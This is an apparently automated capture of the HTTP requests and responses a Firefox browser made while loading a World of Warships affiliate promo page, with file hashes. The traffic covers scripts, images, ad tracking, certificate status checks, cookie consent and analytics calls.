alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (3237), with no line terminators
Size:   1286
Md5:    9a397424825d26f9f815d007cb42a43d
Sha1:   70abb3ae1ea1a802551ff01bd40b6ced2a1b0613
Sha256: 1283e4fa297789d4c953f152fdecc9c4e9a23286a491719ebfabb31782cbfeeb
                                        
                                            GET /glows-46780/src/libs/jquery.fullpage.js HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: W/"3dda1cb6b7c3b1c0f3eb0c52633455bf"
x-amz-request-id: tx0000000000000008619f4-00637642a2-1cdc9228-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:41+00:00
x-id: sto5-up-gc12
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   115641
Md5:    c388c410c816ce55d86ded88089552f3
Sha1:   671adeb56f83b2fe1898af3d3dca128e8d596f5f
Sha256: e24d7b66d9af6a9bd608ed4b67747b623a12e1180d4a74336f66f1b917471d36
                                        
                                            GET /glows-46780/src/images/logo-hor.svg HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: image/svg+xml
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
last-modified: Thu, 17 Nov 2022 14:17:13 GMT
etag: W/"f37677b980c03bd3f2537e0ab36aa703"
x-amz-request-id: tx0000000000000005980ed-00637642a3-1cdf9313-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:42+00:00
x-id: sto5-up-gc10
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- HTML document, ASCII text, with very long lines (4456), with no line terminators
Size:   1771
Md5:    f40e35959c5bb4c4b50f55a07b78014e
Sha1:   3e7d6380901b3cf4290eb08a0fc49f7b6db51f52
Sha256: 538373bc80a6e13c7adf0992b6dba329ac0d14e4bb90077e0d21e7b2115c2e42
                                        
                                            GET /activityi;src=10697551;type=pagev0;cat=allvi0;ord=532627560173;gtm=2wgbu0;gcs=G111;auiddc=1118582409.1670560920;u1=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287;~oref=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287? HTTP/1.1 
Host: 10697551.fls.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         142.250.74.38
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 09 Dec 2022 04:42:00 GMT
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
strict-transport-security: max-age=21600
pragma: no-cache
x-content-type-options: nosniff
content-encoding: br
server: cafe
content-length: 584
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 09-Dec-2022 04:57:00 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1485), with no line terminators
Size:   584
Md5:    8435edfe2d732ecef53e6ee1cd74bcfd
Sha1:   3a6ad474614f9dfb252ee4c6d4a733e85d60cf08
Sha256: 7aaddc130e687f615a58adcb7029b88c45deb9a9f9e595376b2f7ce58d7ad809
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 5744
Cache-Control: max-age=118496
Date: Fri, 09 Dec 2022 04:42:00 GMT
Etag: "6391d208-117"
Expires: Sat, 10 Dec 2022 13:36:56 GMT
Last-Modified: Thu, 08 Dec 2022 12:01:12 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 279

                                        
                                            POST /ca/gsatlasr3dvtlsca2022q1 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:00 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Etag: "187EAA1C5BABE5C9F25911A34FC8F8537CD8EF53"
Expires: Fri, 09 Dec 2022 15:00:00 GMT
Last-Modified: Fri, 09 Dec 2022 03:00:00 UTC
Cache-Control: s-maxage=3600, public, no-transform, must-revalidate
CF-Cache-Status: HIT
Age: 2199
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 776b125bf87b0af6-OSL


--- Additional Info ---
Magic:  data
Size:   1462
Md5:    f5eabe6a0ab4af70c46388096d85765b
Sha1:   bbc3adc839b79b4ac5ae4d776ad8b7787a443f14
Sha256: 8e7b540e51ee755a6caf286556bc56af81ac1fdd2fa361e1d908e9fbfddcf829
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:01 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:01 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /ddm/fls/i/src=10697551;type=pagev0;cat=allvi0;ord=532627560173;gtm=2wgbu0;gcs=G111;auiddc=1118582409.1670560920;u1=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287;~oref=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287 HTTP/1.1 
Host: adservice.google.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://10697551.fls.doubleclick.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         142.250.74.2
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 09 Dec 2022 04:42:01 GMT
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
pragma: no-cache
x-content-type-options: nosniff
content-encoding: br
server: cafe
content-length: 585
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (1484), with no line terminators
Size:   585
Md5:    d3e8bec21a1e54158dfc5fa8b72e1a8a
Sha1:   3ed9f28c219b9d0b841d881f831e96cdaef4b801
Sha256: 868193a0ce41e0bca4a78e19fa8c4dd16079d166c6779d0b7c21852782c9fc16
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "2EDE401D78089D36537129BF22C90E39B306E9C40F83835BBCE82D2757BD3DA0"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=3589
Expires: Fri, 09 Dec 2022 05:41:50 GMT
Date: Fri, 09 Dec 2022 04:42:01 GMT
Connection: keep-alive

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:01 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /scripttemplates/202211.1.0/otBannerSdk.js HTTP/1.1 
Host: cdn.cookielaw.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         104.16.148.64
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:42:01 GMT
content-length: 93485
content-encoding: gzip
content-md5: 9qSRvp3H9roScfT6qXUxeQ==
last-modified: Wed, 30 Nov 2022 07:37:09 GMT
etag: 0x8DAD2A5B0177E6D
x-ms-request-id: 7cacc22c-c01e-014f-273e-055aab000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
cache-control: max-age=86400
cf-cache-status: HIT
age: 72239
accept-ranges: bytes
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 776b125d593db518-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (65451)
Size:   93485
Md5:    f6a491be9dc7f6ba1271f4faa9753179
Sha1:   e11e8e291ca6548f4933103088b8acd15af84191
Sha256: 6cf04708cbb25e9b7144e865deebd75bd4b2d42fa703299ba303a084d457b081
                                        
                                            POST /gseccovsslca2018 HTTP/1.1 
Host: ocsp.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 79
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:01 GMT
Content-Length: 939
Connection: keep-alive
Expires: Tue, 13 Dec 2022 03:34:29 GMT
ETag: "49ffc1a31a68563dc1fd48a1d3974e620842fae9"
Last-Modified: Fri, 09 Dec 2022 03:34:30 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Age: 492
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 776b125d7df80b51-OSL

                                        
                                            GET /ddm/fls/i/src=10697551;type=pagev0;cat=allvi0;ord=532627560173;gtm=2wgbu0;gcs=G111;auiddc=1118582409.1670560920;u1=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287;~oref=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287 HTTP/1.1 
Host: adservice.google.no
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://adservice.google.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         142.250.74.130
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 09 Dec 2022 04:42:01 GMT
expires: Fri, 09 Dec 2022 04:42:01 GMT
cache-control: private, max-age=0
x-content-type-options: nosniff
content-encoding: br
server: cafe
content-length: 85
x-xss-protection: 0
alt-svc: h3="googleads.g.doubleclick.net:443"; ma=2592000,h3=":443"; ma=2592000,h3-29="googleads.g.doubleclick.net:443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="46,43",quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with no line terminators
Size:   85
Md5:    4a3b3637744caa4a0b08fabbd76cc830
Sha1:   755e5626762ecf38f55012da892a227bf50f15f1
Sha256: 6a12009f3d99f10dd5acb27389beefed79eddd7fa55ddcc591baf92861d51bfb
                                        
                                            GET /consent/68edbfbe-e009-4939-a55b-f4c65daa640b/ad5c42f4-14cd-4309-be4a-e049aeb7b78d/en.json HTTP/1.1 
Host: cdn.cookielaw.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://promo.worldofwarships.eu/
Origin: https://promo.worldofwarships.eu
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         104.16.148.64
HTTP/2 200 OK
content-type: application/x-javascript
                                        
date: Fri, 09 Dec 2022 04:42:01 GMT
content-length: 11485
cache-control: public, max-age=86400
content-encoding: gzip
content-md5: tCMBfS7MwFy145IdNu61NQ==
last-modified: Fri, 25 Nov 2022 10:09:21 GMT
etag: 0x8DACECD1F1475FC
x-ms-request-id: ba3e27e9-f01e-00e9-15b6-0024e0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
cf-cache-status: HIT
age: 65585
expires: Sat, 10 Dec 2022 04:42:01 GMT
accept-ranges: bytes
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 776b125dd967b518-OSL
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- HTML document, Unicode text, UTF-8 text, with very long lines (48198), with no line terminators
Size:   11485
Md5:    b423017d2eccc05cb5e3921d36eeb535
Sha1:   b989dd503a71fa6a448860a5d59c28bbceee910b
Sha256: b8aab8ba299a063e0e5faacea59d7cc56da466c0fd3b91a8d03480184eaf7495
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:01 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /watch/14976586/1?wmode=7&page-url=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287&charset=utf-8&browser-info=pv%3A1%3Avf%3A1931hwv4ldos2hv9k9dzvr%3Afp%3A866%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A941%3Acn%3A3%3Adp%3A0%3Als%3A683677183937%3Ahid%3A228847429%3Az%3A0%3Ai%3A20221209044200%3Aet%3A1670560920%3Ac%3A1%3Arn%3A1031475197%3Arqn%3A1%3Au%3A1670560920163701553%3Aw%3A1280x939%3As%3A1280x1024x24%3Ask%3A1%3Awv%3A2%3Ads%3A67%2C21%2C8%2C0%2C517%2C0%2C%2C258%2C56%2C%2C%2C%2C880%3Aco%3A0%3Ans%3A1670560918757%3Afip%3Aa81f3b9bcdd80a361c14af38dc09b309-a81f3b9bcdd80a361c14af38dc09b309-a81f3b9bcdd80a361c14af38dc09b309-4bd84c89c35a312599d807af285e7b5f-4335742423629acc806791d3e9f585f3-5b56a9f28e63b1a76c5f94a136cc484e-61b9878bbce18de73aafc8582a198c0c-e9c964637c807fcca817e718cc2d1338-a81f3b9bcdd80a361c14af38dc09b309-5cbccea2ed3dd5c7a75380ef1cbfadf6-2facd2c41a0047c68391f933b930bc3a%3Arqnl%3A1%3Ast%3A1670560920%3At%3AWorld%C2%A0of%C2%A0Warships%E2%80%94massive%C2%A0naval%C2%A0clashes.%C2%A0Take%C2%A0command%C2%A0of%C2%A0legendary%C2%A0vessels%C2%A0from%C2%A0the%C2%A0early%C2%A020th%C2%A0century%C2%A0and%C2%A0fight%C2%A0for%C2%A0domination%C2%A0on%C2%A0the%C2%A0high%C2%A0seas.&t=gdpr%2814%29mc%28g-2%29clc%280-0-0%29rqnt%281%29aw%281%29fip%281%29ti%282%29 HTTP/1.1 
Host: mc.yandex.ru
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://promo.worldofwarships.eu
Referer: https://promo.worldofwarships.eu/
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         87.250.250.119
HTTP/2 200 OK
content-type: application/json; charset=utf-8
                                        
content-length: 419
date: Fri, 09 Dec 2022 04:42:01 GMT
x-content-type-options: nosniff
access-control-allow-origin: https://promo.worldofwarships.eu
access-control-allow-credentials: true
pragma: no-cache
x-xss-protection: 1; mode=block
expires: Fri, 09-Dec-2022 04:42:01 GMT
last-modified: Fri, 09-Dec-2022 04:42:01 GMT
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JSON data\012- , ASCII text, with very long lines (419), with no line terminators
Size:   419
Md5:    10fd013b56170753ab76129bddd856c4
Sha1:   bcda6ee043fdb864b21a35eba0fa338b8f651158
Sha256: dda922687e6cac47577adee73f0598f5b02ec1f9dd19820a61d6275f56b12609
